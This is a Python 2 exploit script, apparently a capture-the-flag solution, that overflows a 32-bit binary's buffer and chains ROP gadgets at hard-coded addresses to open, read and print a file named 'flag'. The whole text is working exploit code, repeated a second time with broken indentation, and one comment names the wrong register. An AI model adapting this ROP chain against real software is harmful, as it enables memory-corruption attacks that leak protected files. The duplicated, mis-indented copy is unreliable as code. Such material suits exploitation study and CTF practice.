rverton/exploit.py

## exploit.py
import struct

def p(value):
	return struct.pack('<L', value);

writeable_buffer = 0x080ca004

open_addr = 0x80515f0
read_addr = 0x80516a0
write_addr = 0x8051700

pop_eax = 0x080a81d6
pop_edx = 0x08052476
pop_ebx = 0x0805249e
pop_ecx_pop_ebx = 0x0805249d

inc_eax = 0x0806a2ef
inc_ebx = 0x08082cb0    # inc ebx; or al, -0x15; ret
inc_ecx = 0x08083c16    # inc ecx; adc al, 0x39; ret

mov_eax_edx = 0x08083d68	# mov [eax], edx; pop ebx; pop ebp; ret
mov_edx_eax = 0x08078e71
xor_eax_eax = 0x08097a7f

popret = 0x8048560
pop2ret = 0x8048893
pop3ret = 0x8048892

int_0x80 = 0x08052ba0

payload = ''
payload += 'A'*44

# 1/ put "flag" in memory
payload += p(pop_eax)
payload += p(writeable_buffer)
payload += p(pop_edx)
payload += 'flag'
payload += p(mov_eax_edx)
payload += 'AAAA'   # dummy for pop ebx
payload += 'AAAA'		# dummy for pop ebp

# Null-terminate flag string
payload += p(xor_eax_eax)
payload += p(pop_edx)
payload += p(writeable_buffer+0x4)
payload += p(mov_edx_eax)

# 2/ open file
# open(pathname, flags)
# eax = 0x05, ebx = filename, ecx = flags

payload += p(pop_ecx_pop_ebx)
payload += p(0xffffffff)        # ecx = -1
payload += p(writeable_buffer) 	# ebx = buffer
payload += p(inc_ecx)           # ebx = 0

payload += p(xor_eax_eax)
payload += p(inc_eax)           # eax = 1
payload += p(inc_eax)           # eax = 2
payload += p(inc_eax)           # eax = 3
payload += p(inc_eax)           # eax = 4
payload += p(inc_eax)           # eax = 5

payload += p(int_0x80)          # GO!

# 3/ read(fd, addr, count)
# eax = 0x03, ebx = fd, ecx = writeable_buffer, edx = count

payload += p(pop_ecx_pop_ebx)
payload += p(writeable_buffer)  # ecx
payload += p(0xffffffff)        # ebx = -1
payload += p(inc_ebx)           # ebx = 0
payload += p(inc_ebx)           # ebx = 1
payload += p(inc_ebx)           # ebx = 2
payload += p(inc_ebx)           # ebx = 3

payload += p(xor_eax_eax)
payload += p(inc_eax)           # eax = 1
payload += p(inc_eax)           # eax = 2
payload += p(inc_eax)           # eax = 3

payload += p(pop_edx)
payload += p(0x01010101)        # no null bytes

payload += p(int_0x80)          # GO!

# 4/ write(fd, addr, count) to STDOUT
# eax = 0x04, ebx = fd, ecx = writeable_buffer, edx = count
payload += p(pop_ecx_pop_ebx)
payload += p(writeable_buffer) # ecx
payload += p(0xffffffff)        # ebx = -1
payload += p(inc_ebx)           # ebx = 0
payload += p(inc_ebx)           # ebx = 1

payload += p(xor_eax_eax)
payload += p(inc_eax)           # eax = 1
payload += p(inc_eax)           # eax = 2
payload += p(inc_eax)           # eax = 3
payload += p(inc_eax)           # eax = 4

payload += p(pop_edx)
payload += p(0x01010101)        # no null bytes

payload += p(int_0x80)          # GO!

payload += 'BBBB'               # just crash here

print payload
	import struct

	def p(value):
	return struct.pack('<L', value);

	writeable_buffer = 0x080ca004

	open_addr = 0x80515f0
	read_addr = 0x80516a0
	write_addr = 0x8051700

	pop_eax = 0x080a81d6
	pop_edx = 0x08052476
	pop_ebx = 0x0805249e
	pop_ecx_pop_ebx = 0x0805249d

	inc_eax = 0x0806a2ef
	inc_ebx = 0x08082cb0 # inc ebx; or al, -0x15; ret
	inc_ecx = 0x08083c16 # inc ecx; adc al, 0x39; ret

	mov_eax_edx = 0x08083d68 # mov [eax], edx; pop ebx; pop ebp; ret
	mov_edx_eax = 0x08078e71
	xor_eax_eax = 0x08097a7f

	popret = 0x8048560
	pop2ret = 0x8048893
	pop3ret = 0x8048892

	int_0x80 = 0x08052ba0

	payload = ''
	payload += 'A'*44

	# 1/ put "flag" in memory
	payload += p(pop_eax)
	payload += p(writeable_buffer)
	payload += p(pop_edx)
	payload += 'flag'
	payload += p(mov_eax_edx)
	payload += 'AAAA' # dummy for pop ebx
	payload += 'AAAA' # dummy for pop ebp

	# Null-terminate flag string
	payload += p(xor_eax_eax)
	payload += p(pop_edx)
	payload += p(writeable_buffer+0x4)
	payload += p(mov_edx_eax)

	# 2/ open file
	# open(pathname, flags)
	# eax = 0x05, ebx = filename, ecx = flags

	payload += p(pop_ecx_pop_ebx)
	payload += p(0xffffffff) # ecx = -1
	payload += p(writeable_buffer) # ebx = buffer
	payload += p(inc_ecx) # ebx = 0

	payload += p(xor_eax_eax)
	payload += p(inc_eax) # eax = 1
	payload += p(inc_eax) # eax = 2
	payload += p(inc_eax) # eax = 3
	payload += p(inc_eax) # eax = 4
	payload += p(inc_eax) # eax = 5

	payload += p(int_0x80) # GO!

	# 3/ read(fd, addr, count)
	# eax = 0x03, ebx = fd, ecx = writeable_buffer, edx = count

	payload += p(pop_ecx_pop_ebx)
	payload += p(writeable_buffer) # ecx
	payload += p(0xffffffff) # ebx = -1
	payload += p(inc_ebx) # ebx = 0
	payload += p(inc_ebx) # ebx = 1
	payload += p(inc_ebx) # ebx = 2
	payload += p(inc_ebx) # ebx = 3

	payload += p(xor_eax_eax)
	payload += p(inc_eax) # eax = 1
	payload += p(inc_eax) # eax = 2
	payload += p(inc_eax) # eax = 3

	payload += p(pop_edx)
	payload += p(0x01010101) # no null bytes

	payload += p(int_0x80) # GO!

	# 4/ write(fd, addr, count) to STDOUT
	# eax = 0x04, ebx = fd, ecx = writeable_buffer, edx = count
	payload += p(pop_ecx_pop_ebx)
	payload += p(writeable_buffer) # ecx
	payload += p(0xffffffff) # ebx = -1
	payload += p(inc_ebx) # ebx = 0
	payload += p(inc_ebx) # ebx = 1

	payload += p(xor_eax_eax)
	payload += p(inc_eax) # eax = 1
	payload += p(inc_eax) # eax = 2
	payload += p(inc_eax) # eax = 3
	payload += p(inc_eax) # eax = 4

	payload += p(pop_edx)
	payload += p(0x01010101) # no null bytes

	payload += p(int_0x80) # GO!

	payload += 'BBBB' # just crash here

	print payload